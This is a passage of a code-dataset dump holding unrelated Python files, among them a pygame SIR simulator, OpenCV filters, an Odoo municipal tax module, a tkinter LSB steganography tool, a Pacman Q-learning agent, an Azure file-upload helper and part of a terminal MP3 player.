import World, Disease\nfrom statistics import Statistics\n\nclass SIRSimulator:\n def __init__(self, pop_size = 100, world_size = (500, 500)):\n self.graphics = Graphics()\n self.size = self.width, self.height = world_size\n self.running = False\n self.run_simulation = False\n self.clock = pygame.time.Clock()\n self.cursor_steps = 0\n self.stats_period = 500\n self.STAT_EVENT = pygame.USEREVENT+1\n self.compute_stats = False\n self.pop_size = pop_size\n self.world_size = world_size\n self.weight_actors = [1, 1, 1, 1, 1]\n\n self.world = World(nb_actors = pop_size,\n weight_actors = self.weight_actors,\n world_size = self.world_size,\n time = 0)\n self.disease = Disease()\n self.statistics = Statistics()\n\n self.simulation_time_step_ms = 50\n self.simulation_time = 0\n\n def on_init(self):\n colorama.init()\n pygame.init()\n self.graphics.initialize(self.size)\n return True\n\n def initialize_simulation(self):\n self.simulation_time = 0\n self.world= World(nb_actors = self.pop_size,\n weight_actors = self.weight_actors,\n world_size = self.size,\n time = 0)\n self.disease.initialize(self.world, 0)\n if self.compute_stats:\n self.statistics.initialize()\n pygame.time.set_timer(self.STAT_EVENT, self.stats_period)\n\n def on_loop(self):\n t0 = pygame.time.get_ticks()\n\n self.simulation_time += self.simulation_time_step_ms\n self.world.step(self.simulation_time)\n t1 = pygame.time.get_ticks()\n #print(\"Time taken by world step \" + str(t1 - t0) + \" \")\n self.cursor_steps += 1\n\n self.disease.step(self.simulation_time)\n t2 = pygame.time.get_ticks()\n #print(\"Time taken by disease step \" + str(t2 - t1) + \" \")\n self.cursor_steps += 1\n\n def on_render(self):\n self.graphics.render_world(self.world)\n\n def on_cleanup(self):\n pygame.quit()\n colorama.deinit()\n\n def on_event(self, event):\n time = pygame.time.get_ticks()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_p:\n self.initialize_simulation()\n self.run_simulation = True\n\n if event.key == pygame.K_s:\n self.run_simulation = not self.run_simulation\n\n if event.key == pygame.K_ESCAPE:\n self.running = False\n\n if event.type == self.STAT_EVENT:\n self.statistics.step(time, self.world)\n \n\n def on_execute(self):\n self.running = self.on_init()\n\n while(self.running):\n self.cursor_steps = 0\n for event in pygame.event.get():\n self.on_event(event) \n if (self.run_simulation):\n self.on_loop()\n t0 = pygame.time.get_ticks()\n self.on_render()\n t1 = pygame.time.get_ticks()\n #print(\"Time taken by render step \" + str(t1 - t0) + \" \")\n self.cursor_steps += 1\n #print(\"fps : \" + str(self.clock.get_fps()) + \" \")\n self.cursor_steps += 1\n #print(Cursor.UP(self.cursor_steps + 1))\n self.clock.tick(60)\n self.on_cleanup()\n\ndef format_args(args):\n if len(args.world_size) == 0:\n args.world_size = [500, 500]\n elif len(args.world_size) == 1:\n args.world_size = [args.world_size[0], args.world_size[0]]\n else:\n args.world_size = [args.world_size[0], args.world_size[1]]\n \nif __name__ == \"__main__\":\n parser = arg.ArgumentParser(description = '',\n epilog = '',\n add_help = True)\n parser.add_argument('--pop_size', dest = 'pop_size', nargs = '?',\n action = 'store', type = int, required = False,\n default = 100,\n help = ('The total number of individuals in the '\n + 'populations'))\n parser.add_argument('--world_size', dest = 'world_size', nargs = '*',\n action = 'store', type = int, required = False,\n default = [500, 500],\n help = ('The world size'))\n\n args = parser.parse_args()\n format_args(args)\n SIRSim = SIRSimulator(pop_size = args.pop_size,\n world_size = tuple(args.world_size))\n SIRSim.on_execute()\n","sub_path":"SIRSimulator.py","file_name":"SIRSimulator.py","file_ext":"py","file_size_in_byte":4883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"462873310","text":"# 0206.py\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nimg1 = cv2.imread('./lena.jpg')\r\nimg2 = cv2.imread('./lena.jpg')\r\nimg3 = cv2.imread('./LenaNoise.PNG')\r\nimg4 = cv2.imread('./LenaNoise.PNG')\r\n\r\n# 컬러 변환: BGR -> RGB\r\n\r\n#sobel 연산\r\nsobelX = np.array([[-1, 0, 1],\r\n [-2, 0, 2],\r\n [-1, 0, 1]])\r\ngx = cv2.filter2D(img1, cv2.CV_32F, sobelX)\r\nsobelY = np.array([[-1, -2, -1],\r\n [0, 0, 0],\r\n [1, 2, 1]])\r\ngy = cv2.filter2D(img1, cv2.CV_32F, sobelY)\r\nmag = cv2.magnitude(gx, gy)\r\nimg1 = cv2.normalize(mag, 0, 255, cv2.NORM_MINMAX)\r\n\r\n\r\nLaplacianX = np.array([[0, 1, 0],\r\n [1, -4, 1],\r\n [0, 1, 0]], dtype = np.float32)\r\ngx = cv2.filter2D(img2, cv2.CV_32F, LaplacianX)\r\nLaplacianY = np.array([[0, 1, 0],\r\n [1, -4, 1],\r\n [0, 1, 0]], dtype = np.float32)\r\ngy = cv2.filter2D(img2, cv2.CV_32F, LaplacianY)\r\nmag = cv2.magnitude(gx, gy)\r\nimg2 = cv2.normalize(mag, 0, 255, cv2.NORM_MINMAX)\r\n\r\n\r\nSmoothing = np.ones((3, 3), np.float32)/9 #블러효과 명확하게 보이게 5x5필터사용\r\nimg3 = cv2.filter2D(img3, -1, Smoothing)\r\n\r\nweighted = np.array([[1, 2, 1],\r\n [2, 4, 2],\r\n [1, 2, 1]], dtype = np.float32)\r\nSmoothing = weighted/16 \r\nimg4 = cv2.filter2D(img4, -1, Smoothing)\r\n\r\nfig, ax = plt.subplots(2, 2, figsize=(10,10), sharey=True)\r\nfig.canvas.set_window_title('Sample Pictures')\r\n\r\nax[0][0].axis('off')\r\nax[0][0].imshow(img1, aspect = 'auto')\r\n\r\nax[0][1].axis('off')\r\nax[0][1].imshow(img2, aspect = 'auto')\r\n\r\nax[1][0].axis(\"off\")\r\nax[1][0].imshow(img3, aspect = \"auto\")\r\n\r\nax[1][1].axis(\"off\")\r\nax[1][1].imshow(img4, aspect = 'auto')\r\n\r\nplt.subplots_adjust(left=0, bottom=0, right=1, top=1,\r\n wspace=0.05, hspace=0.05)\r\n#plt.savefig(\"./data/0206.png\", bbox_inches='tight')\r\nplt.show()\r\n","sub_path":"OpenCV-filter2D/에지검출,노이즈제거비교.py","file_name":"에지검출,노이즈제거비교.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"86053102","text":"# MIT License\n#\n# Copyright (c) 2020 HENSOLDT\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nfrom pathlib import Path\n\nimage_type_ldr = \"jpeg\"\nimage_type_hdr = \"tiff\"\nfolder_ldr = \"thermal_8_bit\"\nfolder_hdr = \"thermal_16_bit\"\nsize_train_set = 8862\nsize_val_set = 1366\nsize_video_set = 4224\n\n\ndef get_subset(folder):\n images_ldr = [x for x in (folder / folder_ldr).iterdir() if x.is_file() and (x.name[-4:] == image_type_ldr)]\n images_hdr = [x for x in (folder / folder_hdr).iterdir() if x.is_file() and (x.name[-4:] == image_type_hdr)]\n\n if len(images_ldr) == 0 or len(images_hdr) == 0:\n raise IndexError(\"'\" + folder.name + \"' is an empty directory\")\n\n images_ldr.sort()\n images_hdr.sort()\n return {'ldr': images_ldr, 'hdr': images_hdr}\n\n\ndef flir_thermal_dataset(flir_thermal_dataset_root_path):\n # check for correct FLIR data structure\n flir_thermal_dataset_path = Path(flir_thermal_dataset_root_path)\n for folder in flir_thermal_dataset_path.iterdir():\n if folder.name == \"video\":\n if folder.is_dir():\n video = get_subset(folder)\n\n if folder.name == \"val\":\n if folder.is_dir():\n val = get_subset(folder)\n\n if folder.name == \"train\":\n if folder.is_dir():\n train = get_subset(folder)\n\n return {'video': video, 'val': val, 'train': train}\n\n\ndef main():\n print(\"test is running\")\n data = flir_thermal_dataset(\"/Data/FLIR_ADAS_IR_ObjDet_Dataset/FLIR_ADAS_1_3\")\n assert(len(data['train']['ldr']) == size_train_set and len(data['train']['hdr']) == size_train_set)\n assert(len(data['val']['ldr']) == size_val_set and len(data['val']['hdr']) == size_val_set)\n assert(len(data['video']['ldr']) == size_video_set and len(data['video']['hdr']) == size_video_set)\n print(\"test succeeded\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"measures/FLIR_Thermal_Dataset_reader/FLIR_Thermal_Dataset_reader.py","file_name":"FLIR_Thermal_Dataset_reader.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"320380318","text":"# ! usr/bin/python3\n# -*- coding:utf-8 -*-\n\"\"\"\n@Demands descripe:\n创建一个列表元素用于存放2件商品的信息,每件商品使用字典类型,\n商品信息包括:商品编号、商品名称、商品价格。之和完成对商品2的\n操作,以及商品1价格的修改\n@Creator :LeiZhang\n@Create datetime:2018/08/17 16:18\n@Modif datetime:2018/08/18 12:25\n@License:MIT\n\"\"\"\n\n\nimport random\n\n\n'''--------------存储容器预定义区域------------------------------------------------------'''\n# 定义商品列表prod_list\nprod_list = []\n# 定义列表del_prod存储需要删除的商品编号\ndel_prod = [\"商品2\", \"商品90\"]\n# 定义列表mod_prod存储需要更新的商品编号\nmod_prod = [\"商品1\", \"商品80\"]\n\n# 定义存储商品属性的字典prod_attr\nprod_1 = {\"prod_no\": \"商品1\", \"prod_name\": \"中软小甲\", \"prod_price\": 7400}\nprod_2 = {\"prod_no\": \"商品4\", \"prod_name\": \"中软小乙\", \"prod_price\": 89955200}\nprod_3 = {\"prod_no\": \"商品3\", \"prod_name\": \"中软小丙\", \"prod_price\": 458400}\nprod_4 = {\"prod_no\": \"商品2\", \"prod_name\": \"中软小丁\", \"prod_price\": 5255800}\n\n'''----------------商品信息处理----------------------------------------------------------'''\n# 商品信息装载到prod_list列表里\nprod_list = [prod_1, prod_2, prod_3, prod_4]\n\n# 统计商品列表内的商品数量,将数量存入到prod_num里\nprod_num = len(prod_list)\n\n# 打乱列表原有的排序(类似洗牌)\nrandom.shuffle(prod_list)\n\n\n'''---------------完成对商品列表的更新(delete/update)操作--------------------------------'''\n# 在prod_list中检索prod_no的索引\nfor i in range(prod_num):\n # 如果商品编号在待删除的商品列表里,则删除该商品\n if prod_list[i][\"prod_no\"] in del_prod:\n print(\"正在删除编号为{}的商品\".format( prod_list[i][\"prod_no\"]))\n prod_list.remove(prod_list[i])\n\n # 如果商品编号在更新列表mod_prod,则更改该商品的价格\n elif prod_list[i][\"prod_no\"] in mod_prod:\n prod_list[i][\"prod_price\"] = 900\n\n else:\n print(\"没有检索到需要更新的商品编号,不执行任何操作\")\n\n\n'''-------------检查执行完删除或更新操作之后的列表内商品------------------------------------'''\nprint(\"执行完商品信息更新操作后,商品列表如下:\")\nfor prod in prod_list:\n print(prod)","sub_path":"homework/day04/hw02.py","file_name":"hw02.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"201691922","text":"# -*- coding: utf-8 -*-\n\nimport logging\nfrom odoo import api, fields, models, _ \nfrom odoo.exceptions import UserError, ValidationError\n\n_logger = logging.getLogger('__name__')\n\n\n\n\nclass AccountMoveLine(models.Model):\n _inherit = \"account.move.line\"\n\n\n\n concept_id = fields.Many2one('muni.wh.concept', string='Municipal Tax')\n\n\n def _check_balanced(self):\n ''' Assert the move is fully balanced debit = credit.\n An error is raised if it's not the case.\n '''\n moves = self.filtered(lambda move: move.line_ids)\n if not moves:\n return\n\n # /!\\ As this method is called in create / write, we can't make the assumption the computed stored fields\n # are already done. Then, this query MUST NOT depend of computed stored fields (e.g. balance).\n # It happens as the ORM makes the create with the 'no_recompute' statement.\n self.env['account.move.line'].flush(['debit', 'credit', 'move_id'])\n self.env['account.move'].flush(['journal_id'])\n self._cr.execute('''\n SELECT line.move_id, ROUND(SUM(debit - credit), currency.decimal_places)\n FROM account_move_line line\n JOIN account_move move ON move.id = line.move_id\n JOIN account_journal journal ON journal.id = move.journal_id\n JOIN res_company company ON company.id = journal.company_id\n JOIN res_currency currency ON currency.id = company.currency_id\n WHERE line.move_id IN %s\n GROUP BY line.move_id, currency.decimal_places\n HAVING ROUND(SUM(debit - credit), currency.decimal_places) != 0.0;\n ''', [tuple(self.ids)])\n\n query_res = self._cr.fetchall()\n if query_res:\n ids = [res[0] for res in query_res]\n sums = [res[1] for res in query_res]\n\n\n\n\n\nclass AccountMove(models.Model):\n _inherit = 'account.move'\n\n\n wh_muni_id = fields.Many2one('municipality.tax', string='Withholding municipal tax', readonly=True, copy=False)\n\n def conv_div_nac(self,valor):\n self.currency_id.id\n fecha_contable_doc=self.date\n monto_factura=self.amount_total\n valor_aux=0\n #raise UserError(_('moneda compañia: %s')%self.company_id.currency_id.id)\n if self.currency_id.id!=self.company_id.currency_id.id:\n tasa= self.env['res.currency.rate'].search([('currency_id','=',self.currency_id.id),('name','<=',self.date)],order=\"name asc\")\n for det_tasa in tasa:\n if fecha_contable_doc>=det_tasa.name:\n valor_aux=det_tasa.rate\n rate=round(1/valor_aux,2) # LANTA\n #rate=round(valor_aux,2) # ODOO SH\n resultado=valor*rate\n else:\n resultado=valor\n return resultado\n\n def _create_muni_wh_voucher(self):\n\n vals = {}\n values = {}\n muni_wh = self.env['municipality.tax']\n muni_wh_line = self.env['account.move.line']\n _logger.info(\"\"\"\\n\\n\\n Hola se esta ejecutando el action_post de la retencion municipal\\n\\n\\n\"\"\")\n # _logger.info(\"\"\"\\n\\n\\n\\n invoice %s \\n\\n\\n\"\"\", invoice)\n # se crea el registro del modelo municipality.tax.line\n res = []\n for item in self.invoice_line_ids:\n # codigo darrell\n base_impuesto=item.price_subtotal\n impuesto_mun=item.concept_id.aliquot\n # fin codigo darrell\n #raise UserError(_('impuesto_mun= %s')%impuesto_mun)\n if item.concept_id.aliquot>0:\n res.append((0,0, {\n 'code': item.concept_id.code,\n 'aliquot': item.concept_id.aliquot,\n 'concept_id': item.concept_id.id,\n #'base_tax': self.amount_untaxed,\n 'base_tax': self.conv_div_nac(base_impuesto), # correcion darrell\n 'invoice_id': self.id,\n 'invoice_date' : self.date,\n 'invoice_number': self.invoice_number,\n 'invoice_ctrl_number': self.invoice_ctrl_number,\n #'type':self.type, # nuevo darrell\n }))\n _logger.info(\"\\n\\n\\n res %s \\n\\n\\n\\n\", res)\n # Se crea el registro de la retencion\n vals = {\n 'partner_id': self.partner_id.id,\n 'rif': self.partner_id.vat,\n 'invoice_id': self.id,\n 'act_code_ids': res,\n 'type':self.type,\n }\n _logger.info(\"\\n\\n\\n vals %s \\n\\n\\n\", vals)\n muni_tax = muni_wh.create(vals)\n _logger.info(\"\\n\\n\\n muni %s\\n\\n\\n\", muni_tax)\n self.write({'wh_muni_id': muni_tax.id})\n #raise UserError(_('cuentas = %s')%self.write({'wh_muni_id': muni_tax.id}))\n\n def actualiza_voucher_wh(self):\n #raise UserError(_('mama = %s')%self)\n cursor_municipality = self.env['municipality.tax'].search([('id','=',self.wh_muni_id.id)])\n for det in cursor_municipality:\n self.env['municipality.tax'].browse(det.id).write({\n 'type': self.type,\n 'invoice_number': self.invoice_number,\n })\n\n\n def action_post(self):\n \"\"\"This function create municital retention voucher too.\"\"\"\n invoice = super().action_post()\n # es agente de retencion municipal\n _logger.info(\"\\n\\n\\n\\n action_post de Impuestos municipales \\n\\n\\n\\n\")\n \n if self.partner_id.muni_wh_agent==True or self.company_id.partner_id.muni_wh_agent==True:\n # si no existe una retencion ya\n bann=0\n bann=self.verifica_exento_muni()\n if bann>0:\n if not self.wh_muni_id:\n self._create_muni_wh_voucher()\n self.actualiza_voucher_wh()\n self.unifica_alicuota_iguales()\n return invoice\n\n def verifica_exento_muni(self):\n acum=0\n #raise UserError(_('self = %s')%self.id)\n puntero_move_line = self.env['account.move.line'].search([('move_id','=',self.id)])\n for det_puntero in puntero_move_line:\n acum=acum+det_puntero.concept_id.aliquot\n return acum\n\n def unifica_alicuota_iguales(self):\n if self.type=='in_invoice' or self.type=='in_refund' or self.type=='in_receipt':\n type_tax_use='purchase'\n if self.type=='out_invoice' or self.type=='out_refund' or self.type=='out_receipt':\n type_tax_use='sale'\n lista_impuesto = self.env['muni.wh.concept'].search([])\n #raise UserError(_('lista_impuesto = %s')%lista_impuesto)\n for det_tax in lista_impuesto:\n #raise UserError(_('det_tax.id = %s')%det_tax.id)\n lista_mov_line = self.env['municipality.tax.line'].search([('invoice_id','=',self.id),('concept_id','=',det_tax.id)])\n #raise UserError(_('lista_mov_line = %s')%lista_mov_line)\n #amount_untaxed=0\n base_tax=0\n #amount_vat_ret=0\n wh_amount=0\n #retention_amount=0\n if lista_mov_line:\n for det_mov_line in lista_mov_line: \n base_tax=base_tax+det_mov_line.base_tax\n wh_amount=wh_amount+det_mov_line.wh_amount\n #retention_amount=retention_amount+det_mov_line.retention_amount\n\n code=det_mov_line.code\n #raise UserError(_('nombre1 = %s')%nombre)\n aliquot=det_mov_line.aliquot\n invoice_id=det_mov_line.invoice_id.id\n invoice_number=det_mov_line.invoice_number\n municipality_tax_id=det_mov_line.municipality_tax_id.id\n invoice_ctrl_number=det_mov_line.invoice_ctrl_number\n tipe=det_mov_line.type\n concept_id=det_mov_line.concept_id.id\n #raise UserError(_('lista_mov_line = %s')%lista_mov_line)\n lista_mov_line.unlink()\n move_obj = self.env['municipality.tax.line']\n valor={\n 'code':code,\n 'aliquot':aliquot,\n 'invoice_id':invoice_id,\n 'invoice_number':invoice_number,\n 'municipality_tax_id':municipality_tax_id,\n 'invoice_ctrl_number':invoice_ctrl_number,\n 'base_tax':base_tax,\n 'wh_amount':wh_amount,\n 'type':tipe,\n 'concept_id':concept_id,\n }\n move_obj.create(valor)\n\n\n\n\n\n","sub_path":"loca_13/municipality_tax/models/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":8515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"168534979","text":"import cv2\nimport numpy as np\n\nfrom tkinter import *\nfrom tkinter import filedialog\n\nindex=0 #gloabal\nmessage=[]\n\nfilename=\"\"\n\nwindow=Tk()\nwindow.title(\"Linear Steganogarfy\")\ncanvas=Canvas(window,width=500,height=500)\ncanvas.pack()\n\ndef readMessage():\n msg=str(textbox.get())\n print(\"Message: \"+msg)\n \n for letter in msg:\n ascii_code=ord(letter)#convert letter to ASCİ (a=97)\n bin_ascii=bin(ascii_code)#convert Ascii(ınteger) to binary 97=0b1100001\n bin_ascii=bin_ascii[2:] #Splitting 0b1100001 to 1100001 # len:7\n print(\"Ascii code:\"+bin_ascii) \n \n for i in bin_ascii:#binary formda olan ascii üzerinde dön\n message.append(i) #ilgili biti message'a ekle\n \n \n window.destroy() #destroy the window\n \n #call main program \n program()\n\n\ndef binary_change(img_data):\n #change string to list thats the only way you can change least sigficant bit\n\n global index\n #sum=bin(int(img_data,2) + int(message[index],2))\n \n piksel_frame=list(img_data) #piksel değerini liste(array) dönüştür\n size=len(img_data) #uzunluk bilgisini al\n \"\"\"\n print(\"binary form of pixel: {} lsb:{} \".format(data,piksel_frame[size-1]))\n \"\"\"\n piksel_frame[size-1]=message[index]#Lsb ile message ilgili bitini değiştir\n index=index+1 #next message bit için indexi arttır \n\n img_data=\"\".join(piksel_frame)#değiştirlen piksel frame'ini string çevir\n return img_data #pikseli döndür\n\ndef slctimg():\n global filename\n filename=filedialog.askopenfilename(initialdir=\"/\",title=\"Select A file\",filetype=((\"jpeg\",\"*jpg\"),(\"All Files\",\"*.*\")))\n lbl2=Label(window,text=filename,font=(\"arial\",20)).place(x=100,y=50)\n print(filename)\n\n\n#1kb mesaj\n\n\ndef program():\n\n path = r''+str(filename) \n \n img=cv2.imread(path)\n\n #conver to grayscale img\n img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\n #for RGB\n #height,width,channels=img.shape\n\n height,width=img.shape\n\n\n cv2.imshow('image',img)\n print(\"height:{} width:{}, channels:1\".format(height,width))\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n #Read Message for Message.txt \n print(\"Message:\"+str(message))\n\n c=0\n for i in range(0,width):#witdh\n for y in range(0,height):#height\n\n if(c 0 else 0, nearest_ghost_drection)))\n\n # Create features: distance to nearest food and direction to nearest food\n for food_position in food_positions:\n if self.distance(pacman_position, food_position) < nearest_food_distance:\n nearest_food_distance = self.distance(pacman_position, food_position)\n nearest_food_drection = self.direction(pacman_position, food_position)\n features.append(nearest_food_distance)\n features.append(tuple(map(lambda x: x / abs(x) if x > 0 else 0, nearest_food_drection)))\n\n # Create features: is there a wall in each direction\n neighborhood = []\n for i in [-1, 0, 1]:\n for j in [-1, 0, 1]:\n if (i == 0 or j == 0) and (i != 0 or j != 0):\n neighborhood.append(int(state.hasWall(pacman_position[0] + i, pacman_position[1] + j)))\n features.append(tuple(neighborhood))\n\n # Create features: is ghost scared?\n is_scared = []\n for ghost in state.getGhostStates():\n is_scared.append(int(ghost.scaredTimer > 0))\n features.append(tuple(is_scared))\n\n return tuple(features)\n\n def getQValue(self, state, action):\n \"\"\"\n Returns Q(state,action)\n \"\"\"\n\n # Извлечем необходимые фичи из текущего состояния.\n return self._qValues[self.extractsFeatures(state)][action]\n\n def setQValue(self,state,action,value):\n \"\"\"\n Sets the Qvalue for [state,action] to the given value\n \"\"\"\n\n # Извлечем необходимые фичи из текущего состояния.\n self._qValues[self.extractsFeatures(state)][action] = value\n\n#---------------------#start of your code#---------------------#\n\n def getValue(self, state):\n \"\"\"\n Returns max_action Q(state,action)\n where the max is over legal actions.\n \"\"\"\n \n possibleActions = self.getLegalActions(state)\n #If there are no legal actions, return 0.0\n if len(possibleActions) == 0:\n \treturn 0.0\n\n max_action = 0.0\n for action in possibleActions:\n max_action = max(max_action, self.getQValue(state, action))\n return max_action\n \n def getPolicy(self, state):\n \"\"\"\n Compute the best action to take in a state. \n \n \"\"\"\n\n possibleActions = self.getLegalActions(state)\n\n #If there are no legal actions, return None\n if len(possibleActions) == 0:\n \treturn None\n \n best_action = max(possibleActions, key=lambda action: self.getQValue(state, action))\n\n\n return best_action\n\n def getAction(self, state):\n \"\"\"\n Compute the action to take in the current state, including exploration. \n \n With probability self.epsilon, we should take a random action.\n otherwise - the best policy action (self.getPolicy).\n\n HINT: You might want to use util.flipCoin(prob)\n HINT: To pick randomly from a list, use random.choice(list)\n\n \"\"\"\n \n # Pick Action\n possibleActions = self.getLegalActions(state)\n action = None\n \n #If there are no legal actions, return None\n if len(possibleActions) == 0:\n \treturn None\n\n #agent parameters:\n epsilon = self.epsilon\n\n if np.random.random() < epsilon:\n action = random.choice(possibleActions)\n else:\n action = self.getPolicy(state)\n \n\n return action\n\n def update(self, state, action, nextState, reward):\n \"\"\"\n You should do your Q-Value update here\n\n NOTE: You should never call this function,\n it will be called on your behalf\n\n\n \"\"\"\n #agent parameters\n gamma = self.discount\n learning_rate = self.alpha\n\n \n reference_qvalue = reward + gamma * self.getValue(nextState)\n updated_qvalue = learning_rate * reference_qvalue + (1 - learning_rate) * self.getQValue(state, action)\n\n self.setQValue(state,action,updated_qvalue)\n\n\n#---------------------#end of your code#---------------------#\n\n\n\nclass PacmanQAgent(QLearningAgent):\n \"Exactly the same as QLearningAgent, but with different default parameters\"\n\n def __init__(self, epsilon=0.05,gamma=0.7,alpha=0.3, numTraining=0, **args):\n \"\"\"\n These default parameters can be changed from the pacman.py command line.\n For example, to change the exploration rate, try:\n python pacman.py -p PacmanQLearningAgent -a epsilon=0.1\n\n alpha - learning rate\n epsilon - exploration rate\n gamma - discount factor\n numTraining - number of training episodes, i.e. no learning after these many episodes\n \"\"\"\n args['epsilon'] = epsilon\n args['gamma'] = gamma\n args['alpha'] = alpha\n args['numTraining'] = numTraining\n self.index = 0 # This is always Pacman\n QLearningAgent.__init__(self, **args)\n\n def getAction(self, state):\n \"\"\"\n Simply calls the getAction method of QLearningAgent and then\n informs parent of action for Pacman. Do not change or remove this\n method.\n \"\"\"\n action = QLearningAgent.getAction(self,state)\n self.doAction(state,action)\n return action\n\n\n\nclass ApproximateQAgent(PacmanQAgent):\n pass\n","sub_path":"RL/hw03/qlearningAgents_part2_old.py","file_name":"qlearningAgents_part2_old.py","file_ext":"py","file_size_in_byte":7370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"347016128","text":"import os\r\nimport json\r\nfrom azure.storage.fileshare import ShareDirectoryClient\r\nfrom azure.storage.fileshare import ShareFileClient\r\n\r\ndef read_json_repo(filepath):\r\n f = open (filepath, \"r\")\r\n\r\n # Reading from file\r\n data = json.loads(f.read())\r\n \r\n c_str = data[\"c_str\"]\r\n s_name = data[\"s_name\"]\r\n\r\n return c_str, s_name\r\n # filepathrepo = \"configuration/repo_config.json\"\r\n # c_str, s_name = read_json_repo(filepathrepo)\r\n\r\ndef helper_copy_dir(source_dir, desti_dir, c_str, s_name, useless_ele, space = \"\"):\r\n for ele in os.listdir(source_dir):\r\n if ele in useless_ele:\r\n continue\r\n\r\n print(space, int(os.path.isdir(source_dir + \"/\" + ele)), ele)\r\n\r\n if os.path.isdir(source_dir + \"/\" + ele):\r\n dir_client = ShareDirectoryClient.from_connection_string(conn_str=c_str, share_name=s_name, directory_path=desti_dir + \"/\" + ele)\r\n dir_client.create_directory()\r\n\r\n helper_copy_dir(source_dir + \"/\" + ele, desti_dir + \"/\" + ele, c_str, s_name, useless_ele, space = space + \" \")\r\n else:\r\n file_client = ShareFileClient.from_connection_string(conn_str=c_str, share_name=s_name, file_path=desti_dir + \"/\" + ele)\r\n\r\n with open(source_dir + \"/\" + ele, \"rb\") as source_file:\r\n file_client.upload_file(source_file)\r\n\r\ndef upload_source(source_name, source_dir, desti_dir, c_str, s_name, useless_ele = {\"__pycache__\"}, space = \"\"):\r\n\r\n if os.path.isdir(source_dir + \"/\" + source_name):\r\n dir_client = ShareDirectoryClient.from_connection_string(conn_str=c_str, share_name=s_name, directory_path=desti_dir + \"/\" + source_name)\r\n dir_client.create_directory()\r\n\r\n print(source_dir + \"/\" + source_name)\r\n helper_copy_dir(source_dir + \"/\" + source_name, desti_dir + \"/\" + source_name, c_str, s_name, useless_ele, space = space)\r\n \r\n else:\r\n file_client = ShareFileClient.from_connection_string(conn_str=c_str, share_name=s_name, file_path=desti_dir + \"/\" + source_name)\r\n\r\n with open(source_dir + \"/\" + source_name, \"rb\") as source_file:\r\n file_client.upload_file(source_file)\r\n\r\n print(\"Upload Complete\")\r\n\r\n\r\n# filepathrepo = \"configuration/repo_config.json\"\r\n# c_str, s_name = read_json_repo(filepathrepo)\r\n\r\n# source_name = \"app_copy\"\r\n# source_dir = \"repository/apps_info\"\r\n# desti_dir = \"repository/apps_info\"\r\n\r\n# upload_source(source_name, source_dir, desti_dir, c_str, s_name, useless_ele = {\"__pycache__\"}, space=\" \")\r\n","sub_path":"azurerepository/uploadapp/upload_to_azure.py","file_name":"upload_to_azure.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"194223676","text":"#!/usr/bin/env python3\n#----------------------------------------------------------------------#\n# Console MP3 Player #\n# #\n# Author: Drew Johnson #\n# Email: drew.m.johnson2@gmail.com #\n# Date: October 24th 2017 #\n# #\n# This is a mp3 player that can be run directly from your terminal! #\n# With just a few tweaks in the source code you can have this bad boy #\n# working in no time! #\n# #\n#----------------------------------------------------------------------#\n\nimport curses, glob, os, subprocess\n\npath = '/Users/drewjohnson/desktop/songs/*' # Path for importing file names of songs\nprefix = '/Users/drewjohnson/desktop/songs/' # Prefix to be removed from filenames before displaying on screen\nfile=glob.glob(path) # Method used for grabbing file names from folder containing MP3's\nfile2 = file # List of raw paths to file. Used for playing songs\nfiles = [] # List of edited file names for displaying to user\nmessage = \"Arrow keys: select song/change page - Space Bar: start/stop - esc: exit\" # Printed at bottom of screen\nspace = \" \"\nisRunning = False \nmultiList = []\nplayList = [] \n\n#---------------------------------------------------------------#\n# Function for starting audio player subprocess #\n# Parameters: #\n# row - The current location of cursor. #\n# #\n# proecessList - list of current processes. #\n# #\n# page - current location in multi-dimensional list #\n#---------------------------------------------------------------#\ndef playSong(row, processList, page):\n \n if processList[0] == '': # Starting first process\n processList[0] = subprocess.Popen([\"afplay\", playList[page][row]])\n \n elif processList[0].poll() == None: # If a process is currently running, kill process, start new one\n processList[0].kill()\n processList[0] = subprocess.Popen([\"afplay\", playList[page][row]])\n \n else: # Otherwise, start a process\n processList[0] = subprocess.Popen([\"afplay\", playList[page][row]])\n\n#---------------------------------------------------------------#\n# Function behaves as name would suggest. #\n# Parameters: #\n# processList - list of current processes. #\n#---------------------------------------------------------------#\ndef stopPlaying(processList):\n \n processList[0].kill()\n\n#---------------------------------------------------------------#\n# This function removes path prefix from file name and then is #\n# stored in a list for printing to the screen. #\n# Parameters: #\n# text - a full path name to be trimmed. 